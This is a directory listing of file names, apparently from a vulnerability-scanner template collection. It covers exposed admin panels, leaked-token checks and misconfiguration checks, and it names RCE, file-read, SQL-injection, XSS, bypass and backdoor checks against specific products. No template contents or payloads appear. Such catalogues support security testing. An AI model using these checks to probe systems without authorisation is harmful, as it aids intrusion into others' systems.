├── jenkins-login.yaml
├── jfrog.yaml
├── jira-detect-1.yaml
├── jira-detect-2.yaml
├── jira-detect-3.yaml
├── jiva-admin-exposure.yaml
├── jmx-console.yaml
├── joomla-panel.yaml
├── kafka-connect-ui.yaml
├── kafka-monitoring.yaml
├── kafka-topics-ui.yaml
├── keenetic-web-login.yaml
├── kerio-connect-client.yaml
├── key-cloak-admin-panel-2.yaml
├── key-cloak-admin-panel.yaml
├── kronos-workforce-central.yaml
├── kubernetes-dashboard.yaml
├── labtech-panel.yaml
├── lacie-panel-1.yaml
├── lacie-panel-2.yaml
├── lancom-router-panel.yaml
├── landfill-remote-monitoring-control.yaml
├── lansweeper-login-1.yaml
├── lansweeper-login-2.yaml
├── livezilla-login-panel.yaml
├── lucee-login-1.yaml
├── lucee-login-2.yaml
├── luci-login-detection.yaml
├── magento-admin-panel.yaml
├── manage-engine-admanager-panel.yaml
├── manageengine-adaudit-1.yaml
├── manageengine-adaudit-2.yaml
├── manageengine-adselfservice.yaml
├── manageengine-analytics.yaml
├── manageengine-apex-helpdesk.yaml
├── manageengine-applications-manager.yaml
├── manageengine-assetexplorer.yaml
├── manageengine-desktop.yaml
├── manageengine-opmanager.yaml
├── manageengine-servicedesk.yaml
├── manageengine-supportcenter.yaml
├── mantis-detect.yaml
├── meshcentral-login.yaml
├── microsoft-exchange-control-panel.yaml
├── microsoft-exchange-login.yaml
├── microsoft-exchange-panel.yaml
├── mikrotik-routeros.yaml
├── mini-start-page-1.yaml
├── mini-start-page-2.yaml
├── minio-console-detect.yaml
├── minio-detect.yaml
├── mobileiron-login-1.yaml
├── mobileiron-login-2.yaml
├── mobileiron-login-3.yaml
├── mongodb-ops-manager.yaml
├── monitorix-exposure.yaml
├── movable-type-login-1.yaml
├── movable-type-login-2.yaml
├── nessus-panel.yaml
├── netis-router.yaml
├── netlify-cms.yaml
├── netscalar-aaa-login.yaml
├── netscaler-aaa-login.yaml
├── netscaler-gateway.yaml
├── nginx-proxy-manager.yaml
├── nutanix-web-console-login.yaml
├── octoprint-login-1.yaml
├── octoprint-login-2.yaml
├── odoo-database-manager.yaml
├── oipm-detect.yaml
├── oki-data.yaml
├── okiko-sfiler-portal.yaml
├── okta-panel.yaml
├── open-game-panel.yaml
├── open-stack-dashboard-login-1.yaml
├── open-stack-dashboard-login-2.yaml
├── openemr-detect.yaml
├── openerp-database.yaml
├── opennms-web-console.yaml
├── openvpn-monitor-1.yaml
├── openvpn-monitor-2.yaml
├── oracle-business-control.yaml
├── oracle-integrated-manager.yaml
├── oracle-people-enterprise.yaml
├── pacs-connexion-utilisateur.yaml
├── pagespeed-global-admin.yaml
├── pandora-fms-console.yaml
├── parallels-html-client.yaml
├── pentaho-panel.yaml
├── pgadmin-exposure.yaml
├── phpmyadmin-panel-1.yaml
├── phpmyadmin-panel-10.yaml
├── phpmyadmin-panel-11.yaml
├── phpmyadmin-panel-2.yaml
├── phpmyadmin-panel-3.yaml
├── phpmyadmin-panel-4.yaml
├── phpmyadmin-panel-5.yaml
├── phpmyadmin-panel-6.yaml
├── phpmyadmin-panel-7.yaml
├── phpmyadmin-panel-8.yaml
├── phpmyadmin-panel-9.yaml
├── phppgadmin-panel.yaml
├── plastic-scm-login.yaml
├── plesk-obsidian.yaml
├── plesk-onyx.yaml
├── polycom-admin-detect.yaml
├── polycom-login.yaml
├── portainer-init-deploy.yaml
├── powerlogic-ion.yaml
├── project-insight-login.yaml
├── prometheus-exporter-detect.yaml
├── prometheus-exposed-panel.yaml
├── public-tomcat-manager-1.yaml
├── public-tomcat-manager-2.yaml
├── pulse-secure-panel.yaml
├── pure-storage-login.yaml
├── r-webserver-login.yaml
├── rabbitmq-dashboard.yaml
├── radius-manager-1.yaml
├── radius-manager-2.yaml
├── radius-manager-3.yaml
├── radius-manager-4.yaml
├── rancher-panel.yaml
├── redis-commander-exposure.yaml
├── remote-ui-login.yaml
├── rocketmq-console-exposure.yaml
├── rsa-self-service.yaml
├── rstudio-detect.yaml
├── saferoads-vms-login.yaml
├── samba-swat-panel.yaml
├── samsung-printer-detect.yaml
├── sap-hana-xsengine-panel.yaml
├── sap-netweaver-portal.yaml
├── sapfiori-panel-1.yaml
├── sapfiori-panel-2.yaml
├── sauter-login.yaml
├── scs-landfill-control.yaml
├── seats-login.yaml
├── secmail-detect.yaml
├── securenvoy-panel.yaml
├── securityspy-detect.yaml
├── selenoid-ui-exposure.yaml
├── server-backup-login.yaml
├── server-backup-manager-se.yaml
├── servicedesk-login-panel-1.yaml
├── servicedesk-login-panel-2.yaml
├── setup-page-exposure-1.yaml
├── setup-page-exposure-2.yaml
├── setup-page-exposure-3.yaml
├── setup-page-exposure-4.yaml
├── sgp-login-panel.yaml
├── sharecenter-login.yaml
├── shoutcast-server.yaml
├── sidekiq-dashboard.yaml
├── sitecore-login-panel.yaml
├── sitecore-login.yaml
├── sitefinity-login.yaml
├── siteomat-login.yaml
├── skycaiji-admin-panel.yaml
├── solarwinds-orion.yaml
├── solarwinds-servuftp-detect.yaml
├── solr-exposure.yaml
├── somfy-login.yaml
├── sonarqube-login.yaml
├── sonicwall-management-panel.yaml
├── sonicwall-sslvpn-panel.yaml
├── sophos-fw-version-detect-1.yaml
├── sophos-fw-version-detect-2.yaml
├── sphider-login-1.yaml
├── sphider-login-2.yaml
├── sphider-login-3.yaml
├── splunk-login.yaml
├── sql-monitor.yaml
├── squirrelmail-login.yaml
├── strapi-admin-exposure.yaml
├── strapi-panel.yaml
├── sugarcrm-panel-1.yaml
├── sugarcrm-panel-2.yaml
├── supervpn-panel.yaml
├── symantec-dlp-login.yaml
├── symantec-epm-login.yaml
├── symantec-ewep-login.yaml
├── symantec-pgp-global-directory.yaml
├── synnefo-admin-panel.yaml
├── tectuus-scada-monitor.yaml
├── terramaster-login.yaml
├── tikiwiki-cms-1.yaml
├── tikiwiki-cms-2.yaml
├── tomcat-manager-pathnormalization-1.yaml
├── tomcat-manager-pathnormalization-2.yaml
├── tomcat-pathnormalization-1.yaml
├── tomcat-pathnormalization-2.yaml
├── total-web.yaml
├── totemomail-detect.yaml
├── tracer-sc-login.yaml
├── traefik-dashboard.yaml
├── tuxedo-connected-controller.yaml
├── unauthenticated-frp.yaml
├── vigor-login.yaml
├── virtual-ema-detect-1.yaml
├── virtual-ema-detect-2.yaml
├── vmware-horizon.yaml
├── wago-plc-panel.yaml
├── watchguard-panel.yaml
├── weatherlink.yaml
├── weave-scope-dashboard-detect.yaml
├── weave-scope-dashboard.yaml
├── web-local-craft.yaml
├── web-service-panel.yaml
├── webeditors-1.yaml
├── webeditors-2.yaml
├── webeditors-3.yaml
├── webeditors-4.yaml
├── webeditors-5.yaml
├── webeditors-6.yaml
├── webeditors-7.yaml
├── webeditors-8.yaml
├── weblogic-login.yaml
├── webmin-panel-1.yaml
├── webmin-panel-2.yaml
├── whm-login-detect.yaml
├── wildfly-panel.yaml
├── wordpress-login.yaml
├── workresources-rdp.yaml
├── workspace-one-uem.yaml
├── workspaceone-uem-dashboard.yaml
├── wowza-streaming-engine.yaml
├── wso2-management-console.yaml
├── xenforo-login.yaml
├── xenmobile-login.yaml
├── xvr-login.yaml
├── yarn-manager-exposure.yaml
├── zabbix-server-login.yaml
├── zenario-login-panel.yaml
├── zentao-detect.yaml
├── zeroshell-login.yaml
├── zimbra-web-client.yaml
├── zipkin-exposure-1.yaml
├── zipkin-exposure-2.yaml
├── zoho-manageengine-adaudit.yaml
├── zoho-manageengine-adselfservice-plus.yaml
├── zoho-manageengine-analyticsplus.yaml
├── zoho-manageengine-apex-helpdesk.yaml
├── zoho-manageengine-applications-manager.yaml
├── zoho-manageengine-assetexplorer.yaml
├── zoho-manageengine-desktop.yaml
├── zoho-manageengine-opmanager.yaml
├── zoho-manageengine-servicedesk.yaml
├── zoho-manageengine-supportcenter.yaml
└── zte-panel.yaml
├── Exposed-Tokens
├── amazon-mws-auth-token.yaml
├── amazon-sns-topic.yaml
├── artifactory-api-password.yaml
├── artifactory-api-token.yaml
├── aws-access-key-value.yaml
├── bitly-secret-key.yaml
├── braintree-access-token.yaml
├── cloudinary-credentials.yaml
├── credentials-disclosure.yaml
├── discord-webhook.yaml
├── fcm-server-key.yaml
├── general-tokens.yaml
├── google-api-key.yaml
├── google-calendar-link.yaml
├── jdbc-connection-string.yaml
├── jwt-token.yaml
├── mailchimp-api-key.yaml
├── microsoft-teams-webhook.yaml
├── newrelic-admin-api-key.yaml
├── newrelic-insights-key.yaml
├── newrelic-rest-api-key.yaml
├── newrelic-synthetics-location-key.yaml
├── oauth-access-key.yaml
├── picatic-api-key.yaml
├── qdpm-info-leak.yaml
├── ruijie-eg-password-leak.yaml
├── ruijie-nbr1300g-cli-password-leak.yaml
├── sendgrid-api-key.yaml
├── shoppable-token.yaml
├── slack-bot-token.yaml
├── slack-user-token.yaml
├── slack-webhook-token.yaml
├── sonarqube-token.yaml
├── stripe-restricted-key.yaml
├── stripe-secret-key.yaml
├── zapier-webhook-token.yaml
└── zoho-webhook-token.yaml
├── Misconfiguration
├── 74cms-sqli.yaml
├── WooYun-2015-148227.yaml
├── acme-xss.yaml
├── ad-widget-lfi.yaml
├── adobe-connect-username-exposure.yaml
├── adobe-connect-version.yaml
├── advanced-access-manager-lfi.yaml
├── aem-bg-servlet.yaml
├── aem-cached-pages.yaml
├── aem-crx-bypass-1.yaml
├── aem-crx-bypass-2.yaml
├── aem-default-get-servlet-1.yaml
├── aem-default-get-servlet-10.yaml
├── aem-default-get-servlet-11.yaml
├── aem-default-get-servlet-12.yaml
├── aem-default-get-servlet-13.yaml
├── aem-default-get-servlet-14.yaml
├── aem-default-get-servlet-15.yaml
├── aem-default-get-servlet-16.yaml
├── aem-default-get-servlet-17.yaml
├── aem-default-get-servlet-18.yaml
├── aem-default-get-servlet-19.yaml
├── aem-default-get-servlet-2.yaml
├── aem-default-get-servlet-20.yaml
├── aem-default-get-servlet-21.yaml
├── aem-default-get-servlet-22.yaml
├── aem-default-get-servlet-23.yaml
├── aem-default-get-servlet-24.yaml
├── aem-default-get-servlet-25.yaml
├── aem-default-get-servlet-26.yaml
├── aem-default-get-servlet-27.yaml
├── aem-default-get-servlet-28.yaml
├── aem-default-get-servlet-29.yaml
├── aem-default-get-servlet-3.yaml
├── aem-default-get-servlet-30.yaml
├── aem-default-get-servlet-31.yaml
├── aem-default-get-servlet-32.yaml
├── aem-default-get-servlet-33.yaml
├── aem-default-get-servlet-34.yaml
├── aem-default-get-servlet-35.yaml
├── aem-default-get-servlet-36.yaml
├── aem-default-get-servlet-37.yaml
├── aem-default-get-servlet-38.yaml
├── aem-default-get-servlet-39.yaml
├── aem-default-get-servlet-4.yaml
├── aem-default-get-servlet-40.yaml
├── aem-default-get-servlet-41.yaml
├── aem-default-get-servlet-42.yaml
├── aem-default-get-servlet-43.yaml
├── aem-default-get-servlet-44.yaml
├── aem-default-get-servlet-45.yaml
├── aem-default-get-servlet-46.yaml
├── aem-default-get-servlet-47.yaml
├── aem-default-get-servlet-48.yaml
├── aem-default-get-servlet-49.yaml
├── aem-default-get-servlet-5.yaml
├── aem-default-get-servlet-50.yaml
├── aem-default-get-servlet-51.yaml
├── aem-default-get-servlet-52.yaml
├── aem-default-get-servlet-53.yaml
├── aem-default-get-servlet-54.yaml
├── aem-default-get-servlet-55.yaml
├── aem-default-get-servlet-56.yaml
├── aem-default-get-servlet-6.yaml
├── aem-default-get-servlet-7.yaml
├── aem-default-get-servlet-8.yaml
├── aem-default-get-servlet-9.yaml
├── aem-gql-servlet.yaml
├── aem-groovyconsole.yaml
├── aem-hash-querybuilder.yaml
├── aem-jcr-querybuilder.yaml
├── aem-login-status.yaml
├── aem-merge-metadata-servlet.yaml
├── aem-querybuilder-feed-servlet.yaml
├── aem-querybuilder-internal-path-read-1.yaml
├── aem-querybuilder-internal-path-read-2.yaml
├── aem-querybuilder-internal-path-read-3.yaml
├── aem-querybuilder-internal-path-read-4.yaml
├── aem-querybuilder-json-servlet.yaml
├── aem-userinfo-servlet.yaml
├── aem-wcm-suggestions-servlet.yaml
├── airflow-debug.yaml
├── akamai-arl-xss.yaml
├── alfacgiapi-wordpress-1.yaml
├── alfacgiapi-wordpress-2.yaml
├── alfacgiapi-wordpress-3.yaml
├── alfacgiapi-wordpress-4.yaml
├── alibaba-mongoshake-unauth.yaml
├── android-debug-database-exposed.yaml
├── apache-filename-brute-force.yaml
├── apache-flink-unauth-rce.yaml
├── apache-httpd-rce.yaml
├── apache-tomcat-snoop.yaml
├── apc-info-1.yaml
├── apc-info-2.yaml
├── application-yaml-1.yaml
├── application-yaml-2.yaml
├── application-yaml-3.yaml
├── application-yaml-4.yaml
├── artifactory-anonymous-deploy.yaml
├── aspnuke-openredirect.yaml
├── aspose-file-download.yaml
├── aspose-ie-file-download.yaml
├── aspose-pdf-file-download.yaml
├── aspose-words-file-download.yaml
├── aspx-debug-mode.yaml
├── attitude-theme-open-redirect.yaml
├── aws-object-listing.yaml
├── aws-redirect.yaml
├── basic-xss-prober.yaml
├── bems-api-lfi.yaml
├── beward-ipcamera-disclosure.yaml
├── bitrix-open-redirect-1.yaml
├── bitrix-open-redirect-10.yaml
├── bitrix-open-redirect-11.yaml
├── bitrix-open-redirect-12.yaml
├── bitrix-open-redirect-2.yaml
├── bitrix-open-redirect-3.yaml
├── bitrix-open-redirect-4.yaml
├── bitrix-open-redirect-5.yaml
├── bitrix-open-redirect-6.yaml
├── bitrix-open-redirect-7.yaml
├── bitrix-open-redirect-8.yaml
├── bitrix-open-redirect-9.yaml
├── blue-ocean-excellence-lfi.yaml
├── brandfolder-lfi.yaml
├── brandfolder-open-redirect.yaml
├── buffalo-config-injection.yaml
├── bullwark-momentum-lfi.yaml
├── cache-poisoning.yaml
├── cacti-weathermap-file-write-1.yaml
├── cacti-weathermap-file-write-2.yaml
├── caucho-resin-info-disclosure-1.yaml
├── caucho-resin-info-disclosure-2.yaml
├── cgi-test-page.yaml
├── chamilo-lms-sqli-1.yaml
├── chamilo-lms-sqli-2.yaml
├── chamilo-lms-xss.yaml
├── cherry-file-download.yaml
├── church-admin-lfi.yaml
├── ckan-dom-based-xss.yaml
├── clockwork-dashboard-exposure.yaml
├── coldfusion-debug-xss-1.yaml
├── coldfusion-debug-xss-2.yaml
├── commax-biometric-auth-bypass.yaml
├── commax-credentials-disclosure.yaml
├── comtrend-password-exposure.yaml
├── concrete-xss.yaml
├── core-chuangtian-cloud-rce.yaml
├── couchdb-adminparty.yaml
├── crlf-injection-1.yaml
├── crlf-injection-2.yaml
├── crlf-injection-3.yaml
├── crlf-injection-4.yaml
├── crlf-injection-5.yaml
├── crlf-injection-6.yaml
├── crlf-injection-7.yaml
├── crlf-injection-8.yaml
├── crlf-injection-9.yaml
├── cs-cart-unauthenticated-lfi.yaml
├── cx-cloud-upload-detect.yaml
├── d-link-arbitary-fileread.yaml
├── database-error.yaml
├── dedecms-carbuyaction-fileinclude.yaml
├── dedecms-membergroup-sqli.yaml
├── dedecms-openredirect.yaml
├── diarise-theme-lfi.yaml
├── discourse-xss.yaml
├── django-debug-detect.yaml
├── dlink-850L-info-leak.yaml
├── docker-registry.yaml
├── druid-monitor.yaml
├── drupal-user-enum-ajax-1.yaml
├── drupal-user-enum-ajax-2.yaml
├── drupal-user-enum-ajax-3.yaml
├── drupal-user-enum-ajax-4.yaml
├── drupal-user-enum-redirect-1.yaml
├── drupal-user-enum-redirect-2.yaml
├── drupal-user-enum-redirect-3.yaml
├── drupal-user-enum-redirect-4.yaml
├── duomicms-sql-injection.yaml
├── easy-media-gallery-pro-listing.yaml
├── easy-wp-smtp-listing.yaml
├── eatery-restaurant-open-redirect.yaml
├── eclipse-help-system-xss.yaml
├── ecoa-building-automation-lfd.yaml
├── ecoa-building-lfi.yaml
├── ecology-filedownload-directory-traversal.yaml
├── ecology-springframework-directory-traversal.yaml
├── ecshop-sqli.yaml
├── elasticsearch-1.yaml
├── elasticsearch-2.yaml
├── empirecms-xss.yaml
├── erp-nc-directory-traversal.yaml
├── error-based-sql-injection.yaml
├── etcd-unauthenticated-api.yaml
├── etouch-v2-sqli.yaml
├── ewebs-arbitrary-file-reading.yaml
├── exposed-docker-api-1.yaml
├── exposed-docker-api-2.yaml
├── exposed-jquery-file-upload.yaml
├── exposed-kafdrop.yaml
├── exposed-kibana-1.yaml
├── exposed-kibana-2.yaml
├── exposed-service-now.yaml
├── exposed-sqlite-manager-1.yaml
├── exposed-sqlite-manager-2.yaml
├── eyelock-nano-lfd.yaml
├── eyou-email-rce.yaml
├── fanruanoa2012-disclosure-1.yaml
├── fanruanoa2012-disclosure-2.yaml
├── fatpipe-auth-bypass.yaml
├── fatpipe-backdoor.yaml
├── feifeicms-lfr.yaml
├── finereport-path-traversal-1.yaml
├── finereport-path-traversal-2.yaml
├── flir-path-traversal.yaml
├── front-page-misconfig-1.yaml
├── front-page-misconfig-2.yaml
├── geovision-geowebserver-lfi-1.yaml
├── geovision-geowebserver-lfi-2.yaml
├── geovision-geowebserver-xss.yaml
├── gitlab-public-repos.yaml
├── gitlab-public-signup.yaml
├── gitlab-public-snippets-1.yaml
├── gitlab-public-snippets-2.yaml
├── gitlab-user-enumeration.yaml
├── gloo-unauth.yaml
├── gocd-cruise-configuration.yaml
├── gocd-encryption-key.yaml
├── gocd-unauth-dashboard.yaml
├── grafana-public-signup.yaml
├── gsoap-lfi.yaml
├── h3c-imc-rce.yaml
├── hadoop-unauth-1.yaml
├── hadoop-unauth-2.yaml
├── haproxy-status.yaml
├── hasura-graphql-psql-exec.yaml
├── hiboss-rce.yaml
├── hjtcloud-arbitrary-file-read-1.yaml
├── hjtcloud-arbitrary-file-read-2.yaml
├── hjtcloud-rest-arbitrary-file-read.yaml
├── homeautomation-v3-openredirect.yaml
├── horde-unauthenticated-1.yaml
├── horde-unauthenticated-2.yaml
├── hpe-system-management-anonymous.yaml
├── http-etcd-unauthenticated-api-data-leak.yaml
├── huawei-hg659-lfi.yaml
├── huawei-router-auth-bypass.yaml
├── huijietong-cloud-fileread.yaml
├── ibm-friendly-path-exposure-1.yaml
├── ibm-friendly-path-exposure-2.yaml
├── ibm-friendly-path-exposure-3.yaml
├── ibm-friendly-path-exposure-4.yaml
├── ibm-friendly-path-exposure-5.yaml
├── ibm-infoprint-directory-traversal.yaml
├── ibm-infoprint-lfi.yaml
├── icewarp-webclient-rce.yaml
├── interlib-fileread-1.yaml
├── interlib-fileread-2.yaml
├── issuu-panel-lfi.yaml
├── jaeger-ui-dashboard.yaml
├── java-melody-exposed-1.yaml
├── java-melody-exposed-2.yaml
├── jboss-status.yaml
├── jeewms-lfi-1.yaml
├── jeewms-lfi-2.yaml
├── jenkins-asyncpeople.yaml
├── jenkins-script.yaml
├── jenkins-stack-trace.yaml
├── jetty-showcontexts-enable.yaml
├── jfrog-unauth-build-exposed.yaml
├── jira-service-desk-signup.yaml
├── jira-unauthenticated-adminprojects.yaml
├── jira-unauthenticated-dashboards.yaml
├── jira-unauthenticated-installed-gadgets.yaml
├── jira-unauthenticated-projectcategories.yaml
├── jira-unauthenticated-projects.yaml
├── jira-unauthenticated-resolutions.yaml
├── jira-unauthenticated-screens.yaml
├── jira-unauthenticated-user-picker.yaml
├── jkstatus-manager.yaml
├── jolokia-heap-info-disclosure.yaml
├── joomla-com-fabrik-lfi.yaml
├── jupyter-ipython-unauth.yaml
├── kafdrop-xss.yaml
├── karel-ip-phone-lfi.yaml
├── kevinlab-bems-backdoor.yaml
├── kevinlab-bems-sqli.yaml
├── kevinlab-hems-backdoor.yaml
├── keycloak-xss.yaml
├── kubeflow-dashboard-unauth.yaml
├── kubernetes-metrics.yaml
├── kubernetes-pods-1.yaml
├── kubernetes-pods-2.yaml
├── kubernetes-resource-report.yaml
├── landray-oa-fileread-1.yaml
├── landray-oa-fileread-2.yaml
├── laravel-debug-enabled.yaml
├── laravel-debug-error.yaml
├── listserv_maestro_rce-1.yaml
├── listserv_maestro_rce-2.yaml
├── lotuscms-rce-1.yaml
├── lotuscms-rce-2.yaml
├── lucee-xss-1.yaml
├── lucee-xss-2.yaml
├── luftguitar-arbitrary-file-upload.yaml
├── maccmsv10-backdoor.yaml
├── magento-2-exposed-api-1.yaml
├── magento-2-exposed-api-2.yaml
├── magento-2-exposed-api-3.yaml
├── magento-cacheleak.yaml
├── magento-unprotected-dev-files-1.yaml
├── magento-unprotected-dev-files-2.yaml
├── magicflow-lfi-1.yaml
├── magicflow-lfi-2.yaml
├── manage-engine-ad-search.yaml
├── mcafee-epo-rce.yaml
├── metinfo-lfi-1.yaml
├── metinfo-lfi-2.yaml
├── metinfo-lfi-3.yaml
├── microstrategy-ssrf-1.yaml
├── microstrategy-ssrf-2.yaml
├── mida-eframework-xss.yaml
├── mikrotik-graph.yaml
├── minimouse-lfi.yaml
├── misconfigured-docker.yaml
├── moodle-filter-jmol-lfi.yaml
├── moodle-filter-jmol-xss.yaml
├── moodle-xss.yaml
├── mpsec-lfi-1.yaml
├── mpsec-lfi-2.yaml
├── ms-exchange-server-reflected-xss.yaml
├── myucms-lfr.yaml
├── nativechurch-wp-theme-lfd.yaml
├── natshell-path-traversal.yaml
├── natshell-rce.yaml
├── netgear-router-auth-bypass-1.yaml
├── netgear-router-auth-bypass-2.yaml
├── netgear-router-exposure.yaml
├── netis-info-leak.yaml
├── nextcloud-install.yaml
├── nginx-merge-slashes-path-traversal-1.yaml
├── nginx-merge-slashes-path-traversal-2.yaml
├── nginx-merge-slashes-path-traversal-3.yaml
├── nginx-module-vts-xss.yaml
├── nginx-status.yaml
├── nginx-vhost-traffic-status.yaml
├── node-exporter-metrics.yaml
├── ns-asg-file-read.yaml
├── nuuo-file-inclusion.yaml
├── nuuo-nvrmini2-rce.yaml
├── oa-tongda-path-traversal.yaml
├── oa-v9-uploads-file.yaml
├── odoo-cms-redirect.yaml
├── office365-open-redirect.yaml
├── open-redirect-1.yaml
├── open-redirect-10.yaml
├── open-redirect-11.yaml
├── open-redirect-12.yaml
├── open-redirect-13.yaml
├── open-redirect-14.yaml
├── open-redirect-15.yaml
├── open-redirect-16.yaml
├── open-redirect-17.yaml
├── open-redirect-18.yaml
├── open-redirect-19.yaml
├── open-redirect-2.yaml
├── open-redirect-20.yaml
├── open-redirect-21.yaml
├── open-redirect-22.yaml
├── open-redirect-23.yaml
├── open-redirect-3.yaml
├── open-redirect-4.yaml
├── open-redirect-5.yaml
├── open-redirect-6.yaml
├── open-redirect-7.yaml
├── open-redirect-8.yaml
├── open-redirect-9.yaml
├── opensis-lfi-1.yaml
├── opensis-lfi-2.yaml
├── opensns-rce-1.yaml
├── opensns-rce-2.yaml
├── openvpn-hhi.yaml
├── oracle-ebs-bispgraph-file-access-1.yaml
├── oracle-ebs-bispgraph-file-access-2.yaml
├── oracle-ebs-xss-1.yaml
├── oracle-ebs-xss-2.yaml
├── oracle-ebs-xss-3.yaml
├── oracle-siebel-xss.yaml
├── oscommerce-rce.yaml
├── parentlink-xss-1.yaml
├── parentlink-xss-2.yaml
├── pdf-signer-ssti-to-rce.yaml
├── php-errors.yaml
├── php-fpm-status.yaml
├── php-timeclock-xss.yaml
├── php-zerodium-backdoor-rce.yaml
├── phpmyadmin-setup.yaml
├── phpmyadmin-sql.php-server-1.yaml
├── phpmyadmin-sql.php-server-2.yaml
├── phpwiki-lfi.yaml
├── pinpoint-unauth-1.yaml
├── pinpoint-unauth-2.yaml
├── pma-server-import-1.yaml
├── pma-server-import-10.yaml
├── pma-server-import-2.yaml
├── pma-server-import-3.yaml
├── pma-server-import-4.yaml
├── pma-server-import-5.yaml
├── pma-server-import-6.yaml
├── pma-server-import-7.yaml
├── pma-server-import-8.yaml
├── pma-server-import-9.yaml
├── pmb-directory-traversal-1.yaml
├── pmb-directory-traversal-2.yaml
├── pmb-local-file-disclosure.yaml
├── private-key-exposure.yaml
├── processmaker-lfi.yaml
├── putMethod-1.yaml
├── putMethod-2.yaml
├── python-metrics.yaml
├── qcubed-xss-1.yaml
├── qcubed-xss-2.yaml
├── qi-anxin-netkang-next-generation-firewall-rce.yaml
├── qihang-media-disclosure.yaml
├── qihang-media-lfi.yaml
├── rack-mini-profiler.yaml
├── rails6-xss.yaml
├── rce-shellshock-user-agent.yaml
├── rconfig-rce.yaml
├── resin-cnnvd-200705-315.yaml
├── resin-inputfile-fileread.yaml
├── resin-viewfile-lfr.yaml
├── rockmongo-xss.yaml
├── ruijie-networks-lfi.yaml
├── ruijie-networks-rce.yaml
├── salesforce-aura-1.yaml
├── salesforce-aura-2.yaml
├── salesforce-aura-3.yaml
├── samsung-wlan-ap-lfi.yaml
├── samsung-wlan-ap-rce.yaml
├── samsung-wlan-ap-xss.yaml
├── sangfor-edr-auth-bypass.yaml
├── sangfor-edr-rce.yaml
├── sap-directory-listing.yaml
├── sap-netweaver-info-leak.yaml
├── sap-redirect.yaml
├── sassy-social-share.yaml
├── seacms-rce.yaml
├── seowon-router-rce.yaml
├── server-status-localhost.yaml
├── service-pwd.yaml
├── shell-history-1.yaml
├── shell-history-2.yaml
├── shell-history-3.yaml
├── sick-beard-xss.yaml
├── sidekiq-dashboard.yaml
├── simple-crm-sql-injection.yaml
├── sitecore-debug-page.yaml
├── skycaiji-install.yaml
├── solar-log-authbypass.yaml
├── solr-query-dashboard-1.yaml
├── solr-query-dashboard-2.yaml
├── sonarqube-public-projects.yaml
├── sonicwall-sslvpn-shellshock.yaml
├── spark-webui-unauth.yaml
├── spidercontrol-scada-server-info.yaml
├── springboot-actuators-jolokia-xxe-1.yaml
├── springboot-actuators-jolokia-xxe-2.yaml
├── springboot-autoconfig-1.yaml
├── springboot-autoconfig-2.yaml
├── springboot-beans-1.yaml
├── springboot-beans-2.yaml
├── springboot-configprops-1.yaml
├── springboot-configprops-2.yaml
├── springboot-dump-1.yaml
├── springboot-dump-2.yaml
├── springboot-env-1.yaml
├── springboot-env-2.yaml
├── springboot-h2-db-rce.yaml
├── springboot-health-1.yaml
├── springboot-health-2.yaml
├── springboot-heapdump-1.yaml
├── springboot-heapdump-2.yaml
├── springboot-httptrace-1.yaml
├── springboot-httptrace-2.yaml
├── springboot-loggers-1.yaml
├── springboot-loggers-2.yaml
├── springboot-mappings-1.yaml
├── springboot-mappings-2.yaml
├── springboot-metrics-1.yaml
├── springboot-metrics-2.yaml
├── springboot-threaddump-1.yaml
├── springboot-threaddump-2.yaml
├── springboot-trace.yaml
├── symantec-messaging-gateway.yaml
├── symfony-debugmode.yaml
├── tamronos-rce.yaml
├── tcpconfig.yaml
├── thinkcmf-arbitrary-code-execution.yaml
├── thinkcmf-lfi-1.yaml
├── thinkcmf-lfi-2.yaml
├── thinkcmf-rce.yaml
├── thinkific-redirect.yaml
├── thinkphp-2-rce.yaml
├── thinkphp-501-rce.yaml
├── thinkphp-5022-rce.yaml
├── thinkphp-5023-rce.yaml
├── thinkphp-509-information-disclosure.yaml
├── tikiwiki-reflected-xss-1.yaml
├── tikiwiki-reflected-xss-2.yaml
├── tomcat-scripts-1.yaml
├── tomcat-scripts-2.yaml
├── tomcat-scripts-3.yaml
├── tomcat-scripts-4.yaml
├── tomcat-scripts-5.yaml
├── tomcat-scripts-6.yaml
├── top-xss-params.yaml
├── tpshop-directory-traversal.yaml
├── turbocrm-xss.yaml
├── twig-php-ssti.yaml
├── ueditor-file-upload.yaml
├── ultimatemember-open-redirect.yaml
├── unaunthenticated-jenkin.yaml
├── unauth-hoteldruid-panel-1.yaml
├── unauth-hoteldruid-panel-2.yaml
├── unauth-message-read-1.yaml
├── unauth-message-read-2.yaml
├── unauth-spark-api.yaml
├── unauthenticated-airflow.yaml
├── unauthenticated-alert-manager.yaml
├── unauthenticated-glances.yaml
├── unauthenticated-glowroot.yaml
├── unauthenticated-lansweeper.yaml
├── unauthenticated-mongo-express-1.yaml
├── unauthenticated-mongo-express-2.yaml
├── unauthenticated-nacos-access-1.yaml
├── unauthenticated-nacos-access-2.yaml
├── unauthenticated-netdata.yaml
├── unauthenticated-popup-upload.yaml
├── unauthenticated-prtg.yaml
├── unauthenticated-tensorboard.yaml
├── unauthenticated-varnish-cache-purge.yaml
├── unauthenticated-zippkin.yaml
├── unauthorized-hp-printer.yaml
├── ups-status-1.yaml
├── ups-status-2.yaml
├── vanguard-post-xss.yaml
├── viewlinc-crlf-injection.yaml
├── viewpoint-system-status.yaml
├── visual-tools-dvr-rce.yaml
├── vmware-vcenter-lfi-1.yaml
├── vmware-vcenter-lfi-2.yaml
├── vmware-vcenter-lfi-3.yaml
├── vmware-vcenter-lfi-linux.yaml
├── vpms-auth-bypass.yaml
├── w3c-total-cache-ssrf.yaml
├── wamp-server-configuration.yaml
├── wamp-xdebug-detect.yaml
├── webui-rce.yaml
├── weekender-newspaper-open-redirect.yaml
├── wems-manager-xss.yaml
├── wildcard-postmessage.yaml
├── wooyun-path-traversal.yaml
├── wordpress-accessible-wpconfig-1.yaml
├── wordpress-accessible-wpconfig-10.yaml
├── wordpress-accessible-wpconfig-11.yaml
├── wordpress-accessible-wpconfig-12.yaml
├── wordpress-accessible-wpconfig-13.yaml
├── wordpress-accessible-wpconfig-14.yaml
├── wordpress-accessible-wpconfig-15.yaml
├── wordpress-accessible-wpconfig-16.yaml
├── wordpress-accessible-wpconfig-17.yaml
├── wordpress-accessible-wpconfig-18.yaml
├── wordpress-accessible-wpconfig-19.yaml
├── wordpress-accessible-wpconfig-2.yaml
├── wordpress-accessible-wpconfig-3.yaml
├── wordpress-accessible-wpconfig-4.yaml
├── wordpress-accessible-wpconfig-5.yaml
├── wordpress-accessible-wpconfig-6.yaml
├── wordpress-accessible-wpconfig-7.yaml
├── wordpress-accessible-wpconfig-8.yaml
├── wordpress-accessible-wpconfig-9.yaml
